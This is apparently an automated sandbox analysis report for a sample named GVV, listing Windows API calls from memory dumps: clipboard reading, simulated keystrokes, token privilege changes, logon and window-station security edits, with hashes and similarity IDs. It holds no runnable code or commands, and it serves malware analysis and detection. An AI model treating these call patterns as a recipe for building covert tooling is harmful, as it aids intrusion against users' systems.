                  • Part of subcall function 00114E90: FreeLibrary.KERNEL32(00000000,?,?,00114EDD,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114EC0
                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114EFD
                  • Part of subcall function 00114E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00153CDE,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E62
                  • Part of subcall function 00114E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00114E74
                  • Part of subcall function 00114E59: FreeLibrary.KERNEL32(00000000,?,?,00153CDE,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114E87
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$Load$AddressFreeProc
                • String ID:
                • API String ID: 2632591731-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __wsopen_s
                • String ID:
                • API String ID: 3347428461-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0011543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00119A9C
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,001E1444,?,0012FDF5,?,?,0011A976,00000010,001E1440,001113FC,?,001113C6,?,00111129), ref: 00143852
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FreeLibrary.KERNEL32(?,?,001E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00114F6D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID:
                • API String ID: 3664257935-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00112DC4
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LongNamePath_wcslen
                • String ID:
                • API String ID: 541455249-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __fread_nolock
                • String ID:
                • API String ID: 2638373210-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00113837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00113908
                  • Part of subcall function 0011D730: GetInputState.USER32 ref: 0011D807
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00112B6B
                  • Part of subcall function 001130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0011314E
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                • String ID:
                • API String ID: 3667716007-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesW.KERNELBASE(?), ref: 01A808EB
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesW.KERNELBASE(?), ref: 01A808BB
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNELBASE(00000000,00000000,?,00150704,?,?,00000000,?,00150704,00000000,0000000C), ref: 001503B7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00111CBC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: InfoParametersSystem
                • String ID:
                • API String ID: 3098949447-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00115745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0011949C,?,00008000), ref: 00115773
                • GetLastError.KERNEL32(00000002,00000000), ref: 001876DE
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateErrorFileLast
                • String ID:
                • API String ID: 1214770103-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(000001F4), ref: 01A82341
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(000001F4), ref: 01A82341
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001A961A
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001A965B
                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001A969F
                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001A96C9
                • SendMessageW.USER32 ref: 001A96F2
                • GetKeyState.USER32(00000011), ref: 001A978B
                • GetKeyState.USER32(00000009), ref: 001A9798
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001A97AE
                • GetKeyState.USER32(00000010), ref: 001A97B8
                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001A97E9
                • SendMessageW.USER32 ref: 001A9810
                • SendMessageW.USER32(?,00001030,?,001A7E95), ref: 001A9918
                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001A992E
                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001A9941
                • SetCapture.USER32(?), ref: 001A994A
                • ClientToScreen.USER32(?,?), ref: 001A99AF
                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001A99BC
                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001A99D6
                • ReleaseCapture.USER32 ref: 001A99E1
                • GetCursorPos.USER32(?), ref: 001A9A19
                • ScreenToClient.USER32(?,?), ref: 001A9A26
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 001A9A80
                • SendMessageW.USER32 ref: 001A9AAE
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 001A9AEB
                • SendMessageW.USER32 ref: 001A9B1A
                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001A9B3B
                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 001A9B4A
                • GetCursorPos.USER32(?), ref: 001A9B68
                • ScreenToClient.USER32(?,?), ref: 001A9B75
                • GetParent.USER32(?), ref: 001A9B93
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 001A9BFA
                • SendMessageW.USER32 ref: 001A9C2B
                • ClientToScreen.USER32(?,?), ref: 001A9C84
                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001A9CB4
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 001A9CDE
                • SendMessageW.USER32 ref: 001A9D01
                • ClientToScreen.USER32(?,?), ref: 001A9D4E
                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001A9D82
                  • Part of subcall function 00129944: GetWindowLongW.USER32(?,000000EB), ref: 00129952
                • GetWindowLongW.USER32(?,000000F0), ref: 001A9E05
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                • String ID: @GUI_DRAGID$F
                • API String ID: 3429851547-4164748364
                • Opcode ID: 133a92ab2ab76035b85650e1f2d061b740a8102edb4102caac44719461bdec6c
                • Instruction ID: a90b7793011989b9c78dac118a9c5ab5958644f5b6262bfb5c75a2e7e0ca6e71
                • Opcode Fuzzy Hash: 133a92ab2ab76035b85650e1f2d061b740a8102edb4102caac44719461bdec6c
                • Instruction Fuzzy Hash: E242AE78604341AFDB25CF64CC84EAABBE5FF4A314F140619F699876A1D731E890CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001A48F3
                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 001A4908
                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 001A4927
                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 001A494B
                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 001A495C
                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 001A497B
                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001A49AE
                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001A49D4
                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 001A4A0F
                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001A4A56
                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001A4A7E
                • IsMenu.USER32(?), ref: 001A4A97
                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001A4AF2
                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001A4B20
                • GetWindowLongW.USER32(?,000000F0), ref: 001A4B94
                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 001A4BE3
                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 001A4C82
                • wsprintfW.USER32 ref: 001A4CAE
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001A4CC9
                • GetWindowTextW.USER32(?,00000000,00000001), ref: 001A4CF1
                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001A4D13
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001A4D33
                • GetWindowTextW.USER32(?,00000000,00000001), ref: 001A4D5A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                • String ID: %d/%02d/%02d
                • API String ID: 4054740463-328681919
                • Opcode ID: ea148e3b11686e6bca1afcf6bd6a1fc91cbc5a30eb44961d8385c84be7f294ae
                • Instruction ID: f0f60805823df307498c11c7764d861864a017b8eabd9da6d31abffe3fe3bd31
                • Opcode Fuzzy Hash: ea148e3b11686e6bca1afcf6bd6a1fc91cbc5a30eb44961d8385c84be7f294ae
                • Instruction Fuzzy Hash: 3C12D175600214AFEB258F68DC49FEE7BF8AF86710F104129F51AEB2D1DBB49941CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0012F998
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0016F474
                • IsIconic.USER32(00000000), ref: 0016F47D
                • ShowWindow.USER32(00000000,00000009), ref: 0016F48A
                • SetForegroundWindow.USER32(00000000), ref: 0016F494
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0016F4AA
                • GetCurrentThreadId.KERNEL32 ref: 0016F4B1
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0016F4BD
                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0016F4CE
                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0016F4D6
                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0016F4DE
                • SetForegroundWindow.USER32(00000000), ref: 0016F4E1
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0016F4F6
                • keybd_event.USER32(00000012,00000000), ref: 0016F501
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0016F50B
                • keybd_event.USER32(00000012,00000000), ref: 0016F510
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0016F519
                • keybd_event.USER32(00000012,00000000), ref: 0016F51E
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0016F528
                • keybd_event.USER32(00000012,00000000), ref: 0016F52D
                • SetForegroundWindow.USER32(00000000), ref: 0016F530
                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0016F557
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                • String ID: Shell_TrayWnd
                • API String ID: 4125248594-2988720461
                • Opcode ID: 48ef190a2d6d736da7d71690f2d9765e8e9cdbcd82e40f62b12a5933a6f04778
                • Instruction ID: 21bc4848eb14780be26d53a2e90012c6148f41418934fb0f506b7344c52e84b5
                • Opcode Fuzzy Hash: 48ef190a2d6d736da7d71690f2d9765e8e9cdbcd82e40f62b12a5933a6f04778
                • Instruction Fuzzy Hash: C2318271B40218BFEB206BB55C4AFBF7E6CEB45B50F10002AFA05E61D1CBB05D51AEA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 001716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0017170D
                  • Part of subcall function 001716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0017173A
                  • Part of subcall function 001716C3: GetLastError.KERNEL32 ref: 0017174A
                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00171286
                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001712A8
                • CloseHandle.KERNEL32(?), ref: 001712B9
                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001712D1
                • GetProcessWindowStation.USER32 ref: 001712EA
                • SetProcessWindowStation.USER32(00000000), ref: 001712F4
                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00171310
                  • Part of subcall function 001710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001711FC), ref: 001710D4
                  • Part of subcall function 001710BF: CloseHandle.KERNEL32(?,?,001711FC), ref: 001710E9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                • String ID: $default$winsta0
                • API String ID: 22674027-1027155976
                • Opcode ID: d81ea633cab4c8993e84d1a9c8d113897c4f618415dc5335576ad949a6d4afbf
                • Instruction ID: 20a32dfcbb22768e7f034e5d47aedfd2ebc40cdafadbac4462ee6385e9d0ab90
                • Opcode Fuzzy Hash: d81ea633cab4c8993e84d1a9c8d113897c4f618415dc5335576ad949a6d4afbf
                • Instruction Fuzzy Hash: EF819D71900209BFDF219FA8DC49FEE7BB9FF09704F148129F919A62A0D7719984CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 001710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00171114
                  • Part of subcall function 001710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171120
                  • Part of subcall function 001710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 0017112F
                  • Part of subcall function 001710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171136
                  • Part of subcall function 001710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0017114D
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00170BCC
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00170C00
                • GetLengthSid.ADVAPI32(?), ref: 00170C17
                • GetAce.ADVAPI32(?,00000000,?), ref: 00170C51
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00170C6D
                • GetLengthSid.ADVAPI32(?), ref: 00170C84
                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00170C8C
                • HeapAlloc.KERNEL32(00000000), ref: 00170C93
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00170CB4
                • CopySid.ADVAPI32(00000000), ref: 00170CBB
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00170CEA
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00170D0C
                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00170D1E
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170D45
                • HeapFree.KERNEL32(00000000), ref: 00170D4C
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170D55
                • HeapFree.KERNEL32(00000000), ref: 00170D5C
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170D65
                • HeapFree.KERNEL32(00000000), ref: 00170D6C
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00170D78
                • HeapFree.KERNEL32(00000000), ref: 00170D7F
                  • Part of subcall function 00171193: GetProcessHeap.KERNEL32(00000008,00170BB1,?,00000000,?,00170BB1,?), ref: 001711A1
                  • Part of subcall function 00171193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00170BB1,?), ref: 001711A8
                  • Part of subcall function 00171193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00170BB1,?), ref: 001711B7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                • String ID:
                • API String ID: 4175595110-0
                • Opcode ID: cdde17eda09e0baf1e9322ff304336f9b843bd329447da01f8cb586f731b259c
                • Instruction ID: 6d98ad746a487877f5e7cad33ba4de69dd68df015b833fd9283044c1718b287a
                • Opcode Fuzzy Hash: cdde17eda09e0baf1e9322ff304336f9b843bd329447da01f8cb586f731b259c
                • Instruction Fuzzy Hash: D2717D75A0030AEBDF11DFE4DC44FAEBBB8BF09310F148515F918A6291D771AA45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • OpenClipboard.USER32(001ACC08), ref: 0018EB29
                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0018EB37
                • GetClipboardData.USER32(0000000D), ref: 0018EB43
                • CloseClipboard.USER32 ref: 0018EB4F
                • GlobalLock.KERNEL32(00000000), ref: 0018EB87
                • CloseClipboard.USER32 ref: 0018EB91
                • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0018EBBC
                • IsClipboardFormatAvailable.USER32(00000001), ref: 0018EBC9
                • GetClipboardData.USER32(00000001), ref: 0018EBD1
                • GlobalLock.KERNEL32(00000000), ref: 0018EBE2
                • GlobalUnlock.KERNEL32(00000000,?), ref: 0018EC22
                • IsClipboardFormatAvailable.USER32(0000000F), ref: 0018EC38
                • GetClipboardData.USER32(0000000F), ref: 0018EC44
                • GlobalLock.KERNEL32(00000000), ref: 0018EC55
                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0018EC77
                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0018EC94
                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0018ECD2
                • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0018ECF3
                • CountClipboardFormats.USER32 ref: 0018ED14
                • CloseClipboard.USER32 ref: 0018ED59
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                • String ID:
                • API String ID: 420908878-0
                • Opcode ID: 58b575d8e75e97c6503e91a6f467e52b167be090f72076c72df81e2b8744b3f5
                • Instruction ID: 1e07a06347a448176c2453f4e0715005be908a177749e756bea82d96316b09b6
                • Opcode Fuzzy Hash: 58b575d8e75e97c6503e91a6f467e52b167be090f72076c72df81e2b8744b3f5
                • Instruction Fuzzy Hash: 8861E2742043019FD304EF64D894F6ABBE4AF95714F04451DF456972A2DB31EE89CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 001869BE
                • FindClose.KERNEL32(00000000), ref: 00186A12
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00186A4E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00186A75
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00186AB2
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00186ADF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                • API String ID: 3830820486-3289030164
                • Opcode ID: 674e4d6479db7568c7db4e048b22297fedbf6a25014df2c637d455938bed1290
